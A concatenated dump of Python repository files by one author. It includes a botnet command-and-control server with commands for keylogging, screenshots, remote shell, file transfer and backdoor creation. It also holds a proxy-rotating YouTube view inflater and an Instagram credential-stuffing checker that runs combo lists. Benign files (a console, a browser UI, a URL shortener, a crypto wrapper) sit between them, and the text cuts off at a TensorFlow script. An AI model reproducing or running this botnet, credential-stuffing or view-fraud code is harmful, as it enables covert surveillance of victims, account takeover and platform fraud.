def struct(self, num, args=''):
# formats the data that is being sent
return json.dumps({'id': num, 'args': args.split() if not args else args})
def geo(self, session):
try:
if self.wait:return
session.settimeout(15)
self.sendData(session, self.struct(102))
return json.loads(session.recv(1024))
except:pass
def sys(self, session):
try:
if self.wait:return
session.settimeout(15)
self.sendData(session, self.struct(103))
return json.loads(session.recv(1024))
except:pass
def sendData(self, session, data):
try:session.sendall(data)
except:pass
def addBot(self, session):
if not self.server_status:return
bot = Bot(session)
time.sleep(1.5)
bot.system = self.sys(session)
time.sleep(1.5)
bot.location = self.geo(session)
self.botnet.append(bot)
if not self.ping:
self.ping = True
threading.Thread(target=self.startPing).start()
def system(self, num):
try:
bot = self.botnet[eval(num)-1]
if not bot.system:return
system = bot.system
if len(system):print
print '[System Info]'
for n in sorted(system, key=len):
print '[-] {}: {}'.format(n, system[n])
print '[+] Keylogging:',bot.keylogging
except:pass
def location(self, num):
try:
bot = self.botnet[eval(num)-1]
if not bot.location:return
location = bot.location
if len(location):print
print '[Geolocation]'
for n in sorted(location, key=len):
print '[-] {}: {}'.format(n, location[n])
if len(location):print
except:pass
def keylogger(self, num, state):
try:
bot = self.botnet[eval(num)-1]
state = 5 if state.upper() == 'START' else 6 if state.upper() == 'STOP' else 7 if state.upper() == \
'REMOVE' else 8 if state.upper() == 'DUMP' else None
if not state:return
if state == 5:
bot.keylogging = True
self.sendData(bot.session, self.struct(5))
if state == 6:
bot.keylogging = False
self.sendData(bot.session, self.struct(6))
if state == 7:
bot.keylogging = False
self.sendData(bot.session, self.struct(7))
if state == 8:self.showkeys(bot.session)
except:pass
def showkeys(self, session):
self.wait = True
try:
session.settimeout(10)
self.sendData(session, self.struct(8))
size = int(session.recv(1024))
time.sleep(1.5)
session.sendall('200')
session.settimeout(3)
keys = ''
while self.alive:
try:keys+=session.recv(size)
except:break
print base64.b64decode(keys)
except:self.wait = False
def display(self):
if not self.server_status:
print 'Error: Please start the C&C server & try again'
return
# zero bots
if not self.botnet:
print 'Botnet Size: 0'
# display the botnet
for num, bot in enumerate(self.botnet):
try:
ip = bot.location['Ip'] if bot.location else 'UNKNOWN'
ip = ip if ip else 'UNKNOWN'
if not num:
print '\nIP {}\tID'.format(''.ljust(15))
print '.. {}\t..\n'.format(''.ljust(15))
# display information
print '{}\t\t{:02}'.format(ip.ljust(15-len(ip)%15), num+1)
except:pass
if len(self.botnet):print
def killBot(self, bot):
try:
self.kill(bot.session)
del self.botnet[self.botnet.index(bot)]
except:pass
def shell(self, bot, prompt):
self.wait = True
Shell(bot).run(prompt)
self.wait = False
```
#### File: c-and-c-server/core/console.py
```python
import os
import time
import json
from cmd2 import Cmd
from subprocess import Popen
class MainController(Cmd):
''' Control the main program '''
def __init__(self):
Cmd.__init__(self)
self.colors = {
'red': '\033[31m',
'blue': '\033[34m',
'white': '\033[0m',
'green': '\033[32m',
'yellow': '\033[33m'
}
self.debug = True
self.ruler = '-'
self.default_to_shell = True
self.doc_header = '\n{0}Possible Commands {2}({2}type {1}help <{2}command{1}>{2})'.\
format(self.colors['blue'], self.colors['yellow'], self.colors['white'])
self.intro = '\n\ttype {}help{} for help\n'.\
format(self.colors['yellow'], self.colors['white'])
Popen('clear'.split()).wait()
if not os.path.exists('/tmp/msg'):
with open('/tmp/msg','w') as f:pass
print '\n[-] Enter help for help\n[-] Enter help [CMD_NAME] for more detail'''
def _help_menu(self):
""""Show a list of commands which help can be displayed for.
"""
ignore = ['shell', '_relative_load', 'cmdenvironment', 'help', 'history', 'load',
'edit', 'py', 'pyscript', 'set', 'show', 'save', 'shortcuts', 'run']
# get a list of all method names
names = self.get_names()
# remove any command names which are explicitly excluded from the help menu
for name in self.exclude_from_help:
names.remove(name)
cmds_doc = []
help_dict = {}
for name in names:
if name[:5] == 'help_':
help_dict[name[5:]] = 1
names.sort()
prevname = ''
for name in names:
if name[:3] == 'do_':
if name == prevname:
continue
prevname = name
command = name[3:]
if command in ignore:
continue
if command in help_dict:
cmds_doc.append(command)
del help_dict[command]
elif getattr(self, name).__doc__:
cmds_doc.append(command)
else:pass
self.print_topics(self.doc_header, cmds_doc, 15, 80)
def print_topics(self, header, cmds, cmdlen, maxcol):
if cmds:
self.stdout.write("%s\n"%str(header))
if self.ruler:
self.stdout.write("+%s+\n"%str(self.ruler * (len(header))))
self.columnize(cmds, maxcol-1)
self.stdout.write("\n")
# Basic commands
def do_setip(self, arg=None):
''' \n\tDescription: Assign the IP to host the server\n\tUsage: setip [IP]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkIP(arg[0]):return
self.ip = arg[0]
def do_setport(self, arg=None):
''' \n\tDescription: Assign the port to host the server\n\tUsage: setport [PORT]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkPORT(arg[0]):return
self.port = eval(arg[0])
def do_create(self, arg=None):
''' \n\tDescription: Create a backdoor\n\tUsage: create [IP] [PORT] [NAME]\n '''
arg = arg.split()
if not self.checkArg(arg, 3):return
if not self.checkIP(arg[0]):return
if not self.checkPORT(arg[1]):return
if not self.checkName(arg[2]):return
self.createBot(arg[0], arg[1], os.path.splitext(arg[2])[0])
Popen('clear'.split()).wait()
print '[{}+{}] Backdoor Created Successfully'.format(self.colors['green'], self.colors['white']) if \
os.path.exists(os.path.splitext(arg[2])[0]+'.exe') else '[-] Error: Backdoor Creation Failed'
def do_remove(self, arg=None):
''' \n\tDescription: Remove a bot from botnet (Permanently)\n\tUsage: remove [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
bot = self.botnet[eval(arg[0])-1]
self.sendData(bot.session, self.struct(1))
self.killBot(bot)
def do_chrome(self, arg=None):
''' \n\tDescription: Launch chrome & open unlimited amount of tabs\n\tUsage: chrome [ID] [URL1] [URL2] [URLn]\n '''
arg = arg.split()
if not self.checkID(arg[0]):return
if not self.checkArg(arg, min=2):return
self.sendData(self.botnet[eval(arg[0])-1].session, self.struct(97, arg[1:]))
def do_shutdown(self, arg=None):
''' \n\tDescription: Shutdown a bot\n\tUsage: shutdown [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
bot = self.botnet[eval(arg[0])-1]
self.sendData(bot.session, self.struct(96))
self.killBot(bot)
# Botnet commands
def do_botnet(self, arg=None):
''' \n\tDescription: Display a list of connected bots\n\tUsage: botnet\n '''
self.display()
# Bot commands
def do_kill(self, arg=None):
''' \n\tDescription: Kill the connection to a bot (Connects back a later time)\n\tUsage: kill [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
bot = self.botnet[eval(arg[0])-1]
self.sendData(bot.session, self.struct(0))
self.killBot(bot)
def do_reset(self, arg=None):
''' \n\tDescription: Reset the connection to a bot\n\tUsage: reset [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
self.killBot(self.botnet[eval(arg[0])-1])
def do_keylogger(self, arg=None):
''' \n\tDescription: Keylogger\n\tUsage: keylogger [ID] [START|STOP|DUMP|REMOVE]\n '''
arg = arg.split()
if not self.checkArg(arg, 2):return
if not self.checkID(arg[0]):return
self.keylogger(arg[0], arg[1])
def do_getinfo(self, arg=None):
''' \n\tDescription: Display the personal information of a bot\n\tUsage: getinfo [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
self.system(arg[0]) # sys
self.location(arg[0]) # geo
def do_upload(self, arg=None):
''' \n\tDescription: Upload a file to a bot (Uploaded to C:\System)\n\tUsage: upload [ID] [PATH]\n '''
arg = arg.split()
if not self.checkArg(arg, min=2):return
if not self.checkID(arg[0]):return
self.upload(self.botnet[eval(arg[0])-1], ' '.join(arg[1:]))
def do_download(self, arg=None):
''' \n\tDescription: Download a file from a bot\n\tUsage: download [ID] [PATH]\n '''
arg = arg.split()
if not self.checkArg(arg, min=2):return
if not self.checkID(arg[0]):return
self.download(self.botnet[eval(arg[0])-1], ' '.join(arg[1:]))
def do_screenshot(self, arg=None):
''' \n\tDescription: Screenshot of a bot\n\tUsage: screenshot [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
self.download(self.botnet[eval(arg[0])-1], num=100)
def do_shell(self, arg=None):
''' \n\tDescription: Open an interactive shell\n\tUsage: shell [ID]\n '''
arg = arg.split()
if not self.checkArg(arg, 1):return
if not self.checkID(arg[0]):return
bot = self.botnet[eval(arg[0])-1]
try:
self.sendData(bot.session, self.struct(101))
host = bot.system['Username'] if bot.system else 'UNKNOWN'
ip = bot.location['Ip'] if bot.location else 'UNKNOWN'
host = host if host else 'UNKNOWN'
ip = ip if ip else 'UNKNOWN'
self.shell(bot, self.getprompt(ip, host, True))
except:pass
# Server commands
def do_server_start(self, arg=None):
''' \n\tDescription: Start the server\n\tUsage: server_start\n '''
self.startServer()
def do_server_stop(self, arg=None):
''' \n\tDescription: Stop the server\n\tUsage: server_stop\n '''
self.stopServer()
def do_server_restart(self, arg=None):
''' \n\tDescription: Restart the server\n\tUsage: server_restart\n '''
self.restartServer()
def do_server_info(self, arg=None):
''' \n\tDescription: Display information about the server\n\tUsage: server_status\n '''
running = '\n[-] Last Active On: {}:{}'.format(self.activeIP, self.activePort)
connections = '\n[-] Connections: {}'.format(len(self.botnet))
print '\n[-] Port: {}\n[-] IP: {}\n[-] Active: {}{}{}\n\
'.format(self.port,
self.ip,
self.server_status,
connections if self.server_status else '',
running if self.server_status else '')
```
#### File: c-and-c-server/core/prompt.py
```python
import os
from platform import node
class Prompt(object):
''' A nice looking prompt '''
def __init__(self):
# colors
self.n = '\033[0m'
self.b = '\033[94m'
self.r = '\033[91m'
def getprompt(self, name=node(), host=os.getlogin(), shell=False):
dirs = os.getcwd().replace(os.path.expanduser('~'), '')
return '{}{}@{}{}::{}~{}{}# '.format(self.r, host,
name, self.n,
self.b, dirs,
self.n) if not shell else '{}{}@{}{}::# '.format(self.r, name, host, self.n)
``` |
{
"source": "johndemlon/console",
"score": 2
} |
#### File: johndemlon/console/console.py
```python
from sys import version
from platform import system
from os import chdir, getcwd, system as sys_shell
try:
from subprocess import getoutput as shell
except ImportError:
from subprocess import check_output as shell
class Console(object):
__version__ = 0.1
__date__ = '05/31/2018'
__author__ = '<NAME>'
__description__ = 'Console Application'
def __init__(self):
self.LINE = '-'
self.EDGES = '+'
self.DEBUG = False
self.MAX_SIZE = 50
self.prompt = '$> '
self.is_alive = True
self.TABS_AMOUNT = 5
self.home = getcwd()
self.default_to_shell = True
self.cmds = { 'help': self._help }
self.BANNER = 'Possible Commands (type help <command>)'
self.input = raw_input if self.version == 2 else input
self.INTRO = '{0}type help for help{0}'.format('\n\n\t')
self.cls_cmd = 'cls' if system() == 'Windows' else 'clear'
@property
def version(self):
return int(version.split()[0].split('.')[0])
def shell(self, cmds):
if cmds.split()[0].lower() == 'cd':
path = cmds.split()[1] if len(cmds.split()) > 1 else self.home
try:chdir(path)
except FileNotFoundError:pass
else:
print('{0}{1}{0}'.format('\n', shell([cmds]) if self.version == 2 else shell(cmds)))
def set_cmds(self):
# find all function which begin with cmd_
cmd_funcs = [item for item in dir(self) if callable(getattr(self, item))
if not all([item.startswith('__'), item.endswith('__')])
if item.startswith('cmd_')]
# reassign names
for func in cmd_funcs:
name = func.split('cmd_')[1].lower()
self.cmds[name] = getattr(self, func)
def cmd_cls(self, *args):
'''Description: clear the screen\nUsage: cls'''
sys_shell(self.cls_cmd)
def cmd_exit(self, *args):
'''Description: to quit the console\nUsage: quit\nUsage: exit'''
self.stop_loop()
def cmd_quit(self, *args):
'''Description: to quit the console\nUsage: quit\nUsage: exit'''
self.stop_loop()
def _help(self, *args):
'''Description: to display help\nUsage: help <command>\nUsage: help'''
if not len(args):
self.help_menu()
else:
func_name = args[0][0]
if func_name in self.cmds:
doc = self.cmds[func_name].__doc__
if not doc:
print('{0}{1} is not documented{0}'.format('\n\n', func_name))
else:
print('{0}{1}{0}'.format('\n\n', doc))
def help_menu(self):
size = 0
print('\n' + self.BANNER)
all_cmds = sorted(self.cmds, key=len)
cmds = '\n{}'.format(' '* int(self.TABS_AMOUNT - (self.TABS_AMOUNT * 0.5) ))
print('{0}{1}{0}'.format(self.EDGES, self.LINE * self.MAX_SIZE))
for _, cmd in enumerate(all_cmds):
name = cmd + (' ' * self.TABS_AMOUNT)
cmds += name
size += len(name)
next_value_size = 0 if _ > len(all_cmds) else len(all_cmds[_] + (' ' * self.TABS_AMOUNT))
if (size + next_value_size) >= self.MAX_SIZE + (self.TABS_AMOUNT * 0.8):
size = 0
cmds += '\n\n{}'.format(' ' * self.TABS_AMOUNT)
print(cmds + '\n')
def stop_loop(self):
self.is_alive = False
def user_input(self):
user_input = self.input(self.prompt)
if not len(user_input):
return
if user_input.split()[0].lower() in self.cmds:
if len(user_input.split()) > 1:
func = self.cmds[user_input.split()[0].lower()]
args = ' '.join(user_input.split()[1:])
func(args.split())
else:
func = self.cmds[user_input.split()[0].lower()]
func()
else:
if self.default_to_shell:
self.shell(user_input)
def debug_mode(self):
while self.is_alive:
self.user_input()
def user_mode(self):
while self.is_alive:
try:self.user_input()
except:pass
def start_loop(self):
self.set_cmds()
print(self.INTRO)
self.debug_mode() if self.DEBUG else self.user_mode()
``` |
{
"source": "johndemlon/demlon-browser",
"score": 2
} |
#### File: johndemlon/demlon-browser/mainwindow.py
```python
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import sip
from ui_mainwindow import Ui_MainWindow
from intab import *
class MainWindow(QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.ui.tabWidget.tabBar().setDrawBase(False)
self.addNewTabButton()
self.connectActions()
self.closeTab(0)
self.newTab()
# ui.menuBar.hide();
def addNewTabButton(self):
tb = QPushButton()
tb.setObjectName('addTabBtn')
tb.setIcon(QIcon(':/icons/assets/images/dark/appbar.add.png'))
self.ui.tabWidget.setCornerWidget(tb)
def connectActions(self):
# QShortcut *sh = new QShortcut(QKeySequence(tr("Ctrl+N", "File|Open")), this);
# QObject::connect(sh, SIGNAL(activated()), this, SLOT(newTab()));
# Base UI
self.ui.tabWidget.tabCloseRequested.connect(self.closeTab)
self.ui.tabWidget.cornerWidget().pressed.connect(self.newTab)
# Actions
self.ui.actionExit.triggered.connect(self.close)
self.ui.actionNew_Tab.triggered.connect(self.newTab)
def newTab(self):
index = self.ui.tabWidget.addTab(InTab(self.ui.tabWidget), "New Tab")
self.ui.tabWidget.setCurrentIndex(index)
def closeTab(self, index):
child = self.ui.tabWidget.widget(index)
self.ui.tabWidget.removeTab(index)
sip.delete(child)
child = None
``` |
{
"source": "johndemlon/inflate-youtube-views",
"score": 3
} |
#### File: inflate-youtube-views/lib/browser.py
```python
from random import choice
from lib.queue import Queue
from os import remove, path
from threading import Thread
from time import sleep, time
from selenium import webdriver
from lib.const import DEBUG_LOG
from lib.const import USER_AGENTS
from lib.const import DRIVER_PATH
from lib.proxyScraper import Scrape
from lib.const import MIN_WATCH_TIME
from lib.const import MAX_WATCH_TIME
class Viewer(object):
def __init__(self, url, views, visits=0):
self.recentProxies = Queue()
self.proxies = Queue()
self.renewDriver = True
self.isActive = True
self.isAlive = True
self.views = views
self.visits = visits
self.url = url
self.scraper = Scrape(maxSize=30,
protocol='SSL',
cleanProxies=True)
def proxiesManager(self):
while self.isAlive:
while all([self.isAlive, self.proxies.qsize]):
[sleep(1) for _ in range(10) if self.isAlive if self.proxies.qsize]
self.collect()
if self.isAlive:
Thread(target=self.scraper.scrape).start()
while all([self.isAlive, self.scraper.proxies.qsize < 3]):pass
self.collect()
self.scraper.isAlive = False
def collect(self):
while all([self.isAlive, self.scraper.proxies.qsize]):
proxy = self.scraper.proxies.get()
if not self.recentProxies.inQueue(proxy):
self.recentProxies.put(proxy)
self.proxies.put(proxy)
def kill(self):
self.isAlive = False
def watch(self, proxy, driver):
print '\n[!] Proxy-IP: {}\n[-] Country: {}\n[+] Views: {}\n'.format(proxy['ip'], proxy['country'], self.visits+1)
if not self.isAlive:return
try:driver.get(self.url + '&t=5')
except:
self.renewDriver = True
driver.quit()
try:
html = driver.page_source.encode('utf-8')
if any(['ERR_PROXY_CONNECTION_FAILED' in html, 'ERR_TUNNEL_CONNECTION_FAILED' in html, 'ERR_EMPTY_RESPONSE' in html]):
self.renewDriver = True
driver.quit()
except:
self.renewDriver = True
driver.quit()
sleep(3)
self.isActive = False
if self.renewDriver:driver.quit()
else:self.visits += 1
def driver(self, proxy):
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--mute-audio')
chrome_options.add_argument('--log-level=3')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('user-agent={}'.format(choice(USER_AGENTS)))
chrome_options.add_argument('--proxy-server=http://{}:{}'.format(proxy['ip'], proxy['port']))
return webdriver.Chrome(executable_path=DRIVER_PATH, chrome_options=chrome_options)
def start(self):
proxy = None
driver = None
driverUsage = 0
renewDriver = True
Thread(target=self.proxiesManager).start()
while all([self.visits < self.views, self.isAlive]):
try:
if driverUsage == 10:
self.renewDriver = True
if any([not self.isAlive, self.renewDriver]):
proxy = None
if driver:driver.quit()
if self.proxies.qsize:
driverUsage = 0
self.renewDriver = False
proxy = self.proxies.get()
driver = self.driver(proxy)
if all([self.proxies.qsize, proxy]):
self.isActive = True
if not proxy:
proxy = self.proxies.get()
Thread(target=self.watch, args=[proxy, driver]).start()
# wait
while self.isActive:
try:
sleep(0.5)
self.removeDebug()
except KeyboardInterrupt:
self.isAlive = False
driverUsage += 1
if any([not self.isAlive, self.renewDriver]):
proxy = None
if driver:driver.quit()
if self.proxies.qsize:
driverUsage = 0
self.renewDriver = False
proxy = self.proxies.get()
driver = self.driver(proxy)
except KeyboardInterrupt:
self.isAlive = False
if driver:driver.quit()
self.isAlive = False
self.removeDebug()
if self.visits == self.views:
self.visits = 0
def removeDebug(self):
if path.exists(DEBUG_LOG):
remove(DEBUG_LOG)
``` |
{
"source": "johndemlon/instagram-checker",
"score": 3
} |
#### File: johndemlon/instagram-checker/main.py
```python
import requests
import random
import json
import threading
class Instagram_Checker:
APP_VERSION = "1.0.0"
INSTAGRAM_INDEX = "https://instagram.com"
INSTAGRAM_LOGIN_ENDPOINT = "https://www.instagram.com/accounts/login/ajax/"
def __init__(self):
self.proxies = []
self.combo = []
self.threads = []
print('Instagram-Checker by @br0keh - v%s' % self.APP_VERSION)
self.load_lists()
maxt = input('[?] Max threads: ')
self.max_threads = 30 if not maxt.isdigit() else int(maxt)
self.start_all_workers()
def load_lists(self):
print('Loading combo from "combo.list"...')
try:
self.combo = open('combo.list', 'r').readlines()
except:
print('[x] Unable to read combo.list')
if input('[?] Use proxies? (Y/N):') == 'Y':
print('Loading combo from "proxies.list"...')
try:
self.proxies = open('proxies.list', 'r').readlines()
except:
print('[x] Unable to read proxies.list')
def start_all_workers(self):
print('[!] Starting %i threads...' % (self.max_threads))
while len(self.threads) < self.max_threads:
t = threading.Thread(target=self.worker)
t.start()
self.threads.append(t)
def worker(self):
while len(self.combo) > 0:
last = self.combo.pop()
user = last.split(':')[0]
pasw = last.split(':')[1]
self.login(user, pasw)
def message(self, username, password, message):
print("%s : %s / %s" % (username, password, message))
def login(self, username, password):
password = <PASSWORD>', <PASSWORD>', '')
session = requests.Session()
if len(self.proxies) > 0:
session.proxies.update({
'http': 'http://' + random.choice(self.proxies),
'https': 'https://' + random.choice(self.proxies)
})
session.headers.update({
'ig_vw': '1920',
'ig_pr': '1'
})
session.headers.update({
'UserAgent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'x-instagram-ajax': '1',
'X-Requested-With': 'XMLHttpRequest',
'origin': 'https://www.instagram.com',
'ContentType': 'application/x-www-form-urlencoded',
'Connection': 'keep-alive',
'Accept': '*/*',
'Referer': 'https://www.instagram.com',
'authority': 'www.instagram.com',
'Host': 'www.instagram.com',
'Accept-Language': 'en-US;q=0.6,en;q=0.4',
'Accept-Encoding': 'gzip, deflate'
})
try:
request = session.get(self.INSTAGRAM_INDEX)
csrf_token = request.cookies.get_dict()['csrftoken']
session.headers.update({
'X-CSRFToken': csrf_token
})
request = session.post(self.INSTAGRAM_LOGIN_ENDPOINT,
data={
'username': username,
'password': password
})
csrf_token = request.cookies.get_dict()['csrftoken']
session.headers.update({
'X-CSRFToken': csrf_token
})
response = json.loads(request.text)
except:
self.combo.append('%s:%s' % (username, password))
return self.message(username, password, 'REQUEST ERROR. ADDED TO QUEUE AGAIN...')
if response['authenticated'] == True:
return self.message(username, password, 'SUCCESS : [ %s ]' % str(session))
elif response['status'] == 'fail':
return self.message(username, password, '%s' % str(response['message']))
elif response['status'] == 'ok':
return self.message(username, password, 'WRONG CREDENTIALS')
else:
return self.message(username, password, 'UNKNOWN ERROR')
if __name__ == "__main__":
insta_checker = Instagram_Checker()
``` |
{
"source": "johndemlon/url-shorter",
"score": 3
} |
#### File: johndemlon/url-shorter/micro.py
```python
from os import urandom
import requests as urlrequest
from urllib.parse import urlparse
from lib.database import Database
from flask import Flask, render_template, request, jsonify, redirect, abort
class Webserver:
def __init__(self):
self.database = Database()
self.app = Flask(__name__)
self.app.secret_key = urandom(0x200)
@property
def server_url(self):
parse = urlparse(request.url)
return '{}://{}/'.format(parse.scheme, parse.netloc)
def add_paths(self):
self.app.add_url_rule('/', 'index', self.index, defaults={'link_id': ''})
self.app.add_url_rule('/<path:link_id>', 'index', self.index)
self.app.add_url_rule('/create', 'create', self.create, methods=['POST'])
def index(self, link_id):
if link_id:
if self.database.link_id_exists(link_id):
url = self.database.get_link_url(link_id)
return redirect(url)
return abort(404)
return render_template('index.html')
def parser_url(self, url):
parse = urlparse(url)
link1 = '{}://{}{}{}{}{}'.format(
'https' if not parse.scheme else parse.scheme,
parse.netloc.lower(), parse.path, parse.params, '?' + parse.query if parse.query else '', parse.fragment
)
link2 = link1.replace('https', 'http')
try:
urlrequest.get(link1)
link = link1
except:
link = link2
return link if ((parse.netloc or parse.path) and urlparse(request.url).netloc != parse.netloc) else ''
def get_link_id(self, link_url):
url = urlparse(request.url).netloc
link_id = self.database.generate_link_id(url)
self.database.add_link(link_url, link_id)
return link_id
def create(self):
if not 'link' in request.form:
return jsonify({ 'resp': '' })
link_url = request.form['link']
link_url = self.parser_url(link_url)
if not link_url:
return jsonify({ 'resp': '' })
if self.database.link_url_exists(link_url):
return jsonify({ 'resp': self.server_url + self.database.get_link_id(link_url) })
link_id = self.get_link_id(link_url)
return jsonify({ 'resp': self.server_url + link_id})
def start(self):
self.add_paths()
self.database.start()
self.app.run(debug=False)
if __name__ == '__main__':
webserver = Webserver()
webserver.start()
``` |
{
"source": "johndemlon/wrap-pycrpto",
"score": 3
} |
#### File: johndemlon/wrap-pycrpto/crypto.py
```python
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
from Crypto.Signature import pkcs1_15
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Random import get_random_bytes
class CryptoRSA:
@staticmethod
def gen_key():
key = RSA.generate(2048)
private_key = key.export_key()
public_key = key.publickey().export_key()
return public_key, private_key
@staticmethod
def encrypt(data, rec_publ_key):
recipient_key = RSA.import_key(rec_publ_key)
cipher_rsa = PKCS1_OAEP.new(recipient_key)
return cipher_rsa.encrypt(data)
@staticmethod
def decrypt(data, priv_key):
key = RSA.import_key(priv_key)
cipher_rsa = PKCS1_OAEP.new(key)
return cipher_rsa.decrypt(data)
@staticmethod
def sign(data, priv_key):
key = RSA.import_key(priv_key)
_hash = SHA256.new(data)
return pkcs1_15.new(key).sign(_hash)
@staticmethod
def verify(data, signature, publ_key):
key = RSA.import_key(publ_key)
_hash = SHA256.new(data)
try:
pkcs1_15.new(key).verify(_hash, signature)
return True
except ValueError:
return False
@staticmethod
def save(publ, priv):
for fname, key in zip(['public.pem', 'private.key'], [publ, priv]):
with open(fname, 'wb') as f:
f.write(key)
@staticmethod
def read(publ_file, priv_file):
publ = b''
priv = b''
with open('public.pem', 'rb') as f:
for n in f:
publ += n
with open('private.key', 'rb') as f:
for n in f:
priv += n
return publ, priv
class CryptoAES:
nonce_size = 12
@staticmethod
def generate_key():
return get_random_bytes(AES.block_size)
@staticmethod
def encrypt(data, key):
key = SHA256.new(key).digest()
nonce = get_random_bytes(CryptoAES.nonce_size)
cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
ciphertext = cipher.encrypt(data)
return nonce + ciphertext
@staticmethod
def decrypt(ciphertext, key):
cipher_nonce = ciphertext
key = SHA256.new(key).digest()
nonce = cipher_nonce[:CryptoAES.nonce_size]
ciphertext = cipher_nonce[CryptoAES.nonce_size:]
cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
plaintext = cipher.decrypt(ciphertext)
return plaintext
``` |
{
"source": "johnDenbrough/recipe-app-api",
"score": 4
} |
#### File: app/app/calc.py
```python
def add(x, y):
"""add 2 numbers together"""
return x + y
def subtract(x, y):
"""subctract 2 numbers"""
return y - x
``` |
{
"source": "JohndeVostok/IMUSE",
"score": 2
} |
#### File: IMUSE/IMUSE/login_view.py
```python
from django import forms
from django.shortcuts import render, render_to_response
from django.template import RequestContext
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.contrib import auth
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_protect
from regist_view import regist
#from models import User
class LoginForm(forms.Form):
username = forms.CharField(max_length = 50, widget = forms.TextInput(attrs = {"placeholder": "User ID"}))
password = forms.CharField(widget = forms.PasswordInput(attrs = {"placeholder": "Password"}))
def clean(self):
if (auth.authenticate(username = self.cleaned_data['username'], password = self.cleaned_data['password'])) is None:
raise forms.ValidationError("Invalid handle or password")
return self.cleaned_data
@csrf_protect
def login(req):
if req.method == 'POST':
form = LoginForm(req.POST)
if not form.is_valid():
return render(req, 'login.html', {'form': form})
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = auth.authenticate(username = username, password = password)
if user is not None:
auth.login(req, user)
return HttpResponseRedirect("/user/")
else:
raise Http404
else:
login_form = LoginForm()
return render(req, 'login.html', {'form': login_form})
``` |
{
"source": "JohndeVostok/KDD-CUP",
"score": 2
} |
#### File: KDD-CUP/src/fix.py
```python
import pickle
def getBox(idx):
tmp = [[] for i in range(24)]
for i, x in enumerate(data[idx]):
if (x != 0):
tmp[i % 24].append(x)
ans = [[] for i in range(24)]
for i in range(24):
tmp[i].sort()
q1 = tmp[i][int(len(tmp[i]) / 4)]
q3 = tmp[i][int(len(tmp[i]) * 3 / 4)]
iqr = q3 - q1
mn = max([min(tmp[i]), q1 - 1.5 * iqr])
mx = min([max(tmp[i]), q3 + 1.5 * iqr])
ans[i] = [mn, mx, q1, q3]
res.append(ans)
if __name__ == "__main__":
with open("../data/beijing_data.pkl", "rb") as f:
data = pickle.load(f)
res = []
for i in range(35):
getBox(i * 6 + 0)
getBox(i * 6 + 1)
getBox(i * 6 + 4)
with open("../data/bj_box.pkl", "wb") as f:
pickle.dump(res, f)
with open("../data/london_data.pkl", "rb") as f:
data = pickle.load(f)
res = []
for i in range(13):
getBox(i * 3 + 0)
getBox(i * 3 + 1)
with open("../data/ld_box.pkl", "wb") as f:
pickle.dump(res, f)
```
#### File: KDD-CUP/src/ld_ols.py
```python
import pickle
import numpy
import time
import math
from sklearn.linear_model import LinearRegression
aqstations = {'BL0':0, 'CD1':1, 'CD9':2, 'GN0':3, 'GN3':4, 'GR4':5, 'GR9':6, 'HV1':7, 'KF1':8, 'LW2':9,
'ST5':10, 'TH4':11, 'MY7':12}
ngrid = 861
def getCoef(idx):
py = tmpdata[24:]
linear = LinearRegression()
linear.fit(px, py)
res.append([linear.coef_, linear.intercept_])
if __name__ == "__main__":
with open("../data/london_data.pkl", "rb") as f:
dat = pickle.load(f)
l = len(dat[0])
px = numpy.zeros(((l - 48), (ngrid * 4 + 19)), dtype = numpy.float32)
for i in range(48, l):
for j in range(ngrid):
px[i - 48][j * 4] = dat[72 + j * 5][i - 24]
px[i - 48][j * 4 + 1] = dat[72 + j * 5 + 1][i - 24]
px[i - 48][j * 4 + 2] = dat[72 + j * 5 + 2][i - 24]
px[i - 48][j * 4 + 3] = dat[72 + j * 5 + 4][i - 24]
res = []
for st in aqstations:
print(st)
print("PM2.5")
idx = aqstations[st] * 3 + 0
tmpdata = numpy.zeros(l - 24)
for i in range(24, l):
tmpdata[i - 24] = dat[idx][i] - dat[idx][i - 24]
for i in range(48, l):
px[i - 48][ngrid * 4] = math.sin(i / 12 * math.pi)
for j in range(1, 19):
px[i - 48][ngrid * 4 + j] = tmpdata[i - 24 - j]
getCoef(idx)
print("PM10")
idx = aqstations[st] * 3 + 1
tmpdata = numpy.zeros(l - 24)
for i in range(24, l):
tmpdata[i - 24] = dat[idx][i] - dat[idx][i - 24]
for i in range(48, l):
px[i - 48][ngrid * 4] = math.sin(i / 12 * math.pi)
for j in range(1, 19):
px[i - 48][ngrid * 4 + j] = tmpdata[i - 24 - j]
getCoef(idx)
with open("../data/ldols_res.pkl", "wb") as f:
pickle.dump(res, f)
``` |
{
"source": "JohndeVostok/tftest",
"score": 3
} |
#### File: src/pyscript/alexnet.py
```python
import os
import time
import tensorflow as tf
from tensorflow.python.client import timeline
from tensorflow.python.framework import meta_graph
batch_size = 32
num_bathes = 100
def print_tensor_info(tensor):
print("tensor name:", tensor.op.name, "-tensor shape:", tensor.get_shape().as_list())
def inference(images):
parameters = []
with tf.name_scope("conv1") as scope:
